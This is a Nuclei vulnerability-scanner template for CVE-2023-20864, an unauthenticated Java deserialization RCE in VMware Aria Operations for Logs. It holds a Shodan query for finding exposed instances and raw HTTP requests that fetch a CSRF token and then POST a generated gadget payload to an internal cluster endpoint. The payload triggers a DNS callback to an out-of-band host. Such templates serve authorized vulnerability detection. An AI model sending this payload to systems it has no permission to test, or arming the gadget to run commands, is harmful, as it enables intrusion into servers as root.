id: CVE-2023-20864 info: name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2023-0007.html - https://nvd.nist.gov/vuln/detail/CVE-2023-20864 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-20864 cwe-id: CWE-502 epss-score: 0.21157 epss-percentile: 0.95875 cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: vmware product: aria_operations_for_logs shodan-query: title:"vRealize Log Insight" tags: cve,cve2023,vmware,aria,rce,oast http: - raw: - | GET /csrf HTTP/1.1 Host: {{Hostname}} X-Csrf-Token: Fetch - | POST /api/v2/internal/cluster/applyMembership HTTP/1.1 Host: {{Hostname}} X-CSRF-Token: {{xcsrftoken}} Content-type: application/octet-stream {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}} cookie-reuse: true matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: body words: - '"errorMessage":"Internal error' extractors: - type: kval name: xcsrftoken group: 1 internal: true kval: - "X_CSRF_Token" # digest: 4a0a00473045022100d25072bf743fef098d6aa1c950c400d9623495433301eaa1d7489788e1607ced02201bb194e377e2e5526d432d3b911d4b51c27136035a508822c4f890b3b9d4af14:922c64590222798bb761d5b6d8e72950